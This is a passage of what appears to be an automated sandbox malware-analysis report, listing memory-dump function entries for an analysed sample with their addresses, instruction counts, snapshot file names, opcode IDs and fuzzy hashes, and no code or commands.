                                                                            • Source File: 0000003B.00000002.2521997384.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f5721c9f1a3cb750c20ebf043d4c0f467e5be4bc642b604ea9e1c27f8b2e4962
                                                                            • Instruction ID: c4c26eb3ac5662f38cbced2eddbc26774b442e7e59187197e2971ebecb51e428
                                                                            • Opcode Fuzzy Hash: f5721c9f1a3cb750c20ebf043d4c0f467e5be4bc642b604ea9e1c27f8b2e4962
                                                                            • Instruction Fuzzy Hash: 19214471B09A0D4FEB98EF58C4A5B7976E2EBDC310F15453ED44DC32A2CE38A9858B41
                                                                            Function 00007FFD9BC74028 Relevance: .1, Instructions: 77COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2724353781.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6df1e5a9a2edcbee83d416e9e8121dd229e7790645d42c9dd2741373227a018e
                                                                            • Instruction ID: da62ba8173536ba69edcaac01f6432ef2486e27e8ae0eb8c328d8951b21451f6
                                                                            • Opcode Fuzzy Hash: 6df1e5a9a2edcbee83d416e9e8121dd229e7790645d42c9dd2741373227a018e
                                                                            • Instruction Fuzzy Hash: EE213A31E1995EDFDB98DBA8C8A09EDBBB1FF58300F510179D00AE32A1DA246A01CB41
                                                                            Function 00007FFD9B890958 Relevance: .1, Instructions: 74COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2521997384.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9b890000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 497e376dcc4be36c0d11224bdba3cbff52235e703f3de452692fe74d68e8aa88
                                                                            • Instruction ID: 3416771365c53ebba75d5d8b430546efe457513b74b0312e2c864c6528ab889e
                                                                            • Opcode Fuzzy Hash: 497e376dcc4be36c0d11224bdba3cbff52235e703f3de452692fe74d68e8aa88
                                                                            • Instruction Fuzzy Hash: 9811E731A1FA8D4FD725977484349A47BB0EF4A30074A41FAD089CB0F7DE19A986C7A1
                                                                            Function 00007FFD9BC777A0 Relevance: .1, Instructions: 68COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2724353781.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b295c021d664d8d8d88993815ec6e9f125cefb2d3f57a2e82598fa06342444bc
                                                                            • Instruction ID: 6971b582ecb683cc6b2517b04b0aeb64964cd3b5744bd8ddb9cc5d23048902ab
                                                                            • Opcode Fuzzy Hash: b295c021d664d8d8d88993815ec6e9f125cefb2d3f57a2e82598fa06342444bc
                                                                            • Instruction Fuzzy Hash: 9211BB10B1D46F46E7398668C4F49BC76D1EF5030572646FBC45B9B8AAC82CFA81D790
                                                                            Function 00007FFD9BC72790 Relevance: .1, Instructions: 68COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2724353781.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8bda11ed686b48da81565dc0eaa15f29082e0fce39a88b38bffece17b923cf11
                                                                            • Instruction ID: db4eb557c3133dfd41bae110089b60cb715bdb1e95a4c17f7ff7ec1c97e60a1c
                                                                            • Opcode Fuzzy Hash: 8bda11ed686b48da81565dc0eaa15f29082e0fce39a88b38bffece17b923cf11
                                                                            • Instruction Fuzzy Hash: A2112711A1F42E87F6788AE894F05B87791FB91301B2546B9D45BCF1EACC2CFA819790
                                                                            Function 00007FFD9BC71810 Relevance: .1, Instructions: 63COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2724353781.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6e769dac2994da6d49fa750a2768edb96ec9f76242dc77c220f862aad2ccc4b5
                                                                            • Instruction ID: e65f5bdf6f3b82f60b683c025b73fb51208c0dc7ca87df2828af7694558eeadc
                                                                            • Opcode Fuzzy Hash: 6e769dac2994da6d49fa750a2768edb96ec9f76242dc77c220f862aad2ccc4b5
                                                                            • Instruction Fuzzy Hash: 1011C421B09A0D4FEB68EFA494705F97391EF98351B0106BAD44EC74E2DE38F6498390
                                                                            Function 00007FFD9BC70B29 Relevance: .1, Instructions: 61COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2724353781.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ac10d8a5056a2f8000dbc661f3e875434abee0e4d30202c1dd6658f101a00225
                                                                            • Instruction ID: 55dcbd10295201909fd8fcb4a5c6029c52446c772929fea076356cb07fdaa227
                                                                            • Opcode Fuzzy Hash: ac10d8a5056a2f8000dbc661f3e875434abee0e4d30202c1dd6658f101a00225
                                                                            • Instruction Fuzzy Hash: 79113A32A0E78E0FDB3187B448A46AD7FA1DF57701F0601BBD449D71A1C9682A45C361
                                                                            Function 00007FFD9B8BD9C0 Relevance: .1, Instructions: 60COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2521997384.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 864b620768910e98d79fd1d7aa3eebf39205ed54e8431f77786b3980cd23695d
                                                                            • Instruction ID: 62053ee4d15391c79963a633bd636c6848f4e7e322b4eec7e22db76e0332d73c
                                                                            • Opcode Fuzzy Hash: 864b620768910e98d79fd1d7aa3eebf39205ed54e8431f77786b3980cd23695d
                                                                            • Instruction Fuzzy Hash: E9012122B0F66A87E718A73CA8755F973A0EF55629B484177C04DC74D3ED18A8878784
                                                                            Function 00007FFD9BC7669E Relevance: .1, Instructions: 59COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2724353781.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f7d0c50d7e929a9f80c69814ae0a922ec7fc734f50549ec56e44d6e0933912b9
                                                                            • Instruction ID: 774f7602847ed0b6c2e5fa3f3a689524e6cbd1be277d71678abf0187092ccda7
                                                                            • Opcode Fuzzy Hash: f7d0c50d7e929a9f80c69814ae0a922ec7fc734f50549ec56e44d6e0933912b9
                                                                            • Instruction Fuzzy Hash: 6A112B3170A50B4FEB299E64D4B06FC3390EF95361F11427BE819C76E1CF39A6548750
                                                                            Function 00007FFD9BC7168E Relevance: .1, Instructions: 59COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2724353781.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0bdba738a9c8b252289c07a2a08d48bfc5c65681a9628abb29c683d6b403e057
                                                                            • Instruction ID: 786bce573995a307c1a3bd45a1280b91e56ab27000b1947f404da7ef79d0518f
                                                                            • Opcode Fuzzy Hash: 0bdba738a9c8b252289c07a2a08d48bfc5c65681a9628abb29c683d6b403e057
                                                                            • Instruction Fuzzy Hash: 23116B3170650E4FE7289E64D4B06FC3390EF943A1F11427BE909C76E1CF39A64487A0
                                                                            Function 00007FFD9B880C38 Relevance: .1, Instructions: 57COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2521997384.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9b880000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0cab9473edb6007aa99ea9e6e587afa9ca456fd54f0c71c152f78a9d2eb81809
                                                                            • Instruction ID: dff0be1ec1985ade48eef055351781166838b875604cddd851b1dac1c105ac87
                                                                            • Opcode Fuzzy Hash: 0cab9473edb6007aa99ea9e6e587afa9ca456fd54f0c71c152f78a9d2eb81809
                                                                            • Instruction Fuzzy Hash: D811E735B1EA8D8FE722DFA8886119C7BB1EF45710F0645F7C094DB1A2D53866458780
                                                                            Function 00007FFD9BC70CF9 Relevance: .1, Instructions: 54COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2724353781.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 70ab9cd9cb92351c2150e39f828fc469c2966d41b34a9b539bf5f66d833c7dfa
                                                                            • Instruction ID: 3251f65f896e10fb6d2031ca0502c1bbeb066a23e4bbccc95697b5ca171bbe57
                                                                            • Opcode Fuzzy Hash: 70ab9cd9cb92351c2150e39f828fc469c2966d41b34a9b539bf5f66d833c7dfa
                                                                            • Instruction Fuzzy Hash: 9C01D231F0EA4C4FDB69EBE898B15ECB7A1EF59320F05017AD009C32A7DD2869428310
                                                                            Function 00007FFD9BC74888 Relevance: .1, Instructions: 53COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2724353781.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5d9b328e7e8ac265d76ba95d34858fbb022ac6cdfa00a6e9ee8f2ffeae0ba99a
                                                                            • Instruction ID: 646c0af0ef57cb80afa3e23486b3aa4e063b809f9bca89289e42569e6c3e0c74
                                                                            • Opcode Fuzzy Hash: 5d9b328e7e8ac265d76ba95d34858fbb022ac6cdfa00a6e9ee8f2ffeae0ba99a
                                                                            • Instruction Fuzzy Hash: 4F115A42F0F1EFA2F63851F424B11BC5544EF84220F1A01FED41EDB1E6DC4D2A8162A2
                                                                            Function 00007FFD9B8B3015 Relevance: .1, Instructions: 53COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2521997384.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 08c23c16142e1e0fa3a09abce6684cb30bce52c40c0f178785bb7e857cc10792
                                                                            • Instruction ID: 17f8de1c1c5a063fe6d9770aea54bb6a0399a9ecc9b2b2b5107418a945a484db
                                                                            • Opcode Fuzzy Hash: 08c23c16142e1e0fa3a09abce6684cb30bce52c40c0f178785bb7e857cc10792
                                                                            • Instruction Fuzzy Hash: A301CC32B0D96E8BEBA8EB68C4657A87391FF58310F0503BAD45DC32D5DE186D464B81
                                                                            Function 00007FFD9B8C46F2 Relevance: .1, Instructions: 53COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2521997384.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0b5265029b02aa6c00f81a96d35536691969d2cd098a07481bd2bc1cd73b05d6
                                                                            • Instruction ID: 32cc75aacfd90187cf5956648ff93f2b779add0a2a30c57cad34b3ce7569ab4c
                                                                            • Opcode Fuzzy Hash: 0b5265029b02aa6c00f81a96d35536691969d2cd098a07481bd2bc1cd73b05d6
                                                                            • Instruction Fuzzy Hash: 3611A971B0950ECBFBB8FF9488B66B93392EF98350F59017AD41DC31D6DE2869428B41
                                                                            Function 00007FFD9B8C5012 Relevance: .1, Instructions: 52COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2521997384.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e3ab244b0d9a0daab1ded28ef049e7823611d026c3169853c3a517a8aac6653a
                                                                            • Instruction ID: 7f55135b30ee2408756957ef188fbd2eb4068ebebb2daa1f87a3a9e44d51c09b
                                                                            • Opcode Fuzzy Hash: e3ab244b0d9a0daab1ded28ef049e7823611d026c3169853c3a517a8aac6653a
                                                                            • Instruction Fuzzy Hash: 73010C71E0850D8FDB58EB98C4A5AAD77F2EB9C310F15412ED41AE3395CF2869418B41
                                                                            Function 00007FFD9B880C40 Relevance: .1, Instructions: 51COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2521997384.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9b880000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f55ccc75b0ddbacaf6541b72e714224925d8eefd141fdd6bfad0d315c39ea941
                                                                            • Instruction ID: 746515e8b20481b43a312154eea7961bce95d500439dd2e424ea8d5c05f8eff7
                                                                            • Opcode Fuzzy Hash: f55ccc75b0ddbacaf6541b72e714224925d8eefd141fdd6bfad0d315c39ea941
                                                                            • Instruction Fuzzy Hash: 8011E531F1EA8D8FE722DFA4886009D7FB1EF46710F0641F7C094DB2A2D9386A458780
                                                                            Function 00007FFD9B8BE38F Relevance: .0, Instructions: 49COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2521997384.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3c192aad26570a28eb9852d2e789c7065acf3d38aa2306f2039efd2e2df75ac4
                                                                            • Instruction ID: 39affe24fc43887d12e1518f41effbc7a340c98f6e1f308ff44855f13ac11937
                                                                            • Opcode Fuzzy Hash: 3c192aad26570a28eb9852d2e789c7065acf3d38aa2306f2039efd2e2df75ac4
                                                                            • Instruction Fuzzy Hash: AE015232F0852E8FEBE4966894957FD73D1EB98312F054831E109C6590DE28AA818BC0
                                                                            Function 00007FFD9BC70C69 Relevance: .0, Instructions: 48COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2724353781.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2cc47fb623ac414a5309d1206cb898d08bc996d721e9d9028afce57db7be1ade
                                                                            • Instruction ID: bfa33bed3ba910dbefad9dfd5e2a915689b0c4e0106a7315b0d5f76179565fb1
                                                                            • Opcode Fuzzy Hash: 2cc47fb623ac414a5309d1206cb898d08bc996d721e9d9028afce57db7be1ade
                                                                            • Instruction Fuzzy Hash: F1017C31B0991E8FDB28E79894A19BCB3A1EF88720B15427AD40ED3692CA247D51C795
                                                                            Function 00007FFD9B8BEE80 Relevance: .0, Instructions: 48COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2521997384.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 35264e5e3a324b0ed2c15cf72a55d0b286466bd3c41e7dcfe68e2a83f9d4e970
                                                                            • Instruction ID: e557bd1a739122e24631daac6e062994dd2c39199b70c62ef0d00206b3151635
                                                                            • Opcode Fuzzy Hash: 35264e5e3a324b0ed2c15cf72a55d0b286466bd3c41e7dcfe68e2a83f9d4e970
                                                                            • Instruction Fuzzy Hash: E6016232F0992D8FEBA4E768E451BE8B391EB98361F420572D40DD32A5DE6869414BC0
                                                                            Function 00007FFD9BC7681C Relevance: .0, Instructions: 47COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2724353781.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1acf110245c43ae90dec22afda9722e0233135569c3ae06c6d53493f573e9e34
                                                                            • Instruction ID: 382378dedf9ecb8df5e2924e5ad330a328e46ab786c7dfa801c683ac0d17292b
                                                                            • Opcode Fuzzy Hash: 1acf110245c43ae90dec22afda9722e0233135569c3ae06c6d53493f573e9e34
                                                                            • Instruction Fuzzy Hash: 2101D820B19A6A4FD719A77058649A97790EF4535474046BFD08FCB4D2EE2CA509C391
                                                                            Function 00007FFD9B880C48 Relevance: .0, Instructions: 45COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2521997384.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9b880000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 421debad41467fb6ccc61581254d0dd1d70276ffa3fc9816191ea8b129ea36b5
                                                                            • Instruction ID: 6519aef3443bc1cd8b35089857717ddef662785ed6f77057937f2e419bb79be0
                                                                            • Opcode Fuzzy Hash: 421debad41467fb6ccc61581254d0dd1d70276ffa3fc9816191ea8b129ea36b5
                                                                            • Instruction Fuzzy Hash: 31018031E1EA8D9FE726DFA4886049D7FB1EF46710F1641F7C0A4DB2A2D9386A458780
                                                                            Function 00007FFD9B894132 Relevance: .0, Instructions: 43COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2521997384.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9b890000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3371e3b2b860f7753a73de985d9b76c55bf5e0f02a53856409842bd566860fe1
                                                                            • Instruction ID: 856a80b0cd9a5488b84782f2098877c8d47dd8a6cb04b7cfa0475996c4ecf58e
                                                                            • Opcode Fuzzy Hash: 3371e3b2b860f7753a73de985d9b76c55bf5e0f02a53856409842bd566860fe1
                                                                            • Instruction Fuzzy Hash: 9F011E31F1551F8AEF28DB88D864AFEB6B1FF54344F400239D415972E9DF7869418780
                                                                            Function 00007FFD9B8C36A4 Relevance: .0, Instructions: 40COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2521997384.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 85f123f49ff9da3a88017e2ff3e128f1b17a6ead471bec0885dd77b970b2d4f9
                                                                            • Instruction ID: e8bfea0d5355c06aaeb69ab5b3e6d51b495077cc2a07f11990bd69573d7df5df
                                                                            • Opcode Fuzzy Hash: 85f123f49ff9da3a88017e2ff3e128f1b17a6ead471bec0885dd77b970b2d4f9
                                                                            • Instruction Fuzzy Hash: EC0171B1F0560F8FE764EB98C855ABE73E0FB58311F014636C019D33A5EB3466428B80
                                                                            Function 00007FFD9BC74E82 Relevance: .0, Instructions: 39COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2724353781.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 784cf17fcb851e65293729424d6478443dd75b45d14f816f324d237625de8cea
                                                                            • Instruction ID: 891bfe6b1fa4d262e253a58a1efd8a9051e8049aabdf0bb15959644a91ea2024
                                                                            • Opcode Fuzzy Hash: 784cf17fcb851e65293729424d6478443dd75b45d14f816f324d237625de8cea
                                                                            • Instruction Fuzzy Hash: 15F0623154F3C9AFD7229BB088A14AD7FA4EF43220B1A01EAD485C70A2D52C5746C762
                                                                            Function 00007FFD9B886C1A Relevance: .0, Instructions: 39COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2521997384.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9b880000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 559137e37e5985a297bed6561e41bf909d6f6bbca97dfa82e3f265f2b3d08e16
                                                                            • Instruction ID: ca93f2959aa2348824aa106be06ec8f829573f2f35f2c4383d1024bd3b2b0ae1
                                                                            • Opcode Fuzzy Hash: 559137e37e5985a297bed6561e41bf909d6f6bbca97dfa82e3f265f2b3d08e16
                                                                            • Instruction Fuzzy Hash: EC011734A08E1DCFCB65DF54C495AA973B1FB5C300F5105A9D44ED7260DB34AA45CF81
                                                                            Function 00007FFD9B883696 Relevance: .0, Instructions: 39COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2521997384.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9b880000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 65e8be95179b52e3161798d2a7ed0564b4310aa8133acfcddd3b2d38e3e24a30
                                                                            • Instruction ID: fbd84bb240e6ae2ac9753cf1f42eaf4c11986d7e39ea946345689bbb6a2b7331
                                                                            • Opcode Fuzzy Hash: 65e8be95179b52e3161798d2a7ed0564b4310aa8133acfcddd3b2d38e3e24a30
                                                                            • Instruction Fuzzy Hash: EA013630E5DD1E8BEB74EB58CC606F873A1EF58311F1601B9D45ED32A2CD786AC18A00
                                                                            Function 00007FFD9B8BB609 Relevance: .0, Instructions: 36COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2521997384.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: eab761df1f901a2800449163705961ad9ec1baa430f8a28f6b3ce071fdfc6890
                                                                            • Instruction ID: 09986c0eb061ce59d61a45bfc836a8dcf1feb46916f9dd4b75226c717d720ff9
                                                                            • Opcode Fuzzy Hash: eab761df1f901a2800449163705961ad9ec1baa430f8a28f6b3ce071fdfc6890
                                                                            • Instruction Fuzzy Hash: 43F02021B0DBC80FC729962A88A5021BFE1DF9B50130A12EFC086C72A3DC48AC868345
                                                                            Function 00007FFD9B894179 Relevance: .0, Instructions: 35COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2521997384.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9b890000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 13e9878ab42f587fc5a3bae8e0e98b0ff69d30e0812fd8b1931c04646003df65
                                                                            • Instruction ID: c28be2b0679ba6c059d2e556964bf6c48648a9fa0365348baa57147361ede310
                                                                            • Opcode Fuzzy Hash: 13e9878ab42f587fc5a3bae8e0e98b0ff69d30e0812fd8b1931c04646003df65
                                                                            • Instruction Fuzzy Hash: 21F04F70B1691E8BEF68DB88D864ABEB7B1FF54315F40463AD416D32A4DF746A018780
                                                                            Function 00007FFD9BC76678 Relevance: .0, Instructions: 34COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2724353781.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c32df264843ac0bcdabc130060458cb5e4b4bd519d7c833661e8c1ae6d12baf3
                                                                            • Instruction ID: ccc9bd2722999464784289349383bcf51fe2d14272ec7da04c50aba9436ede76
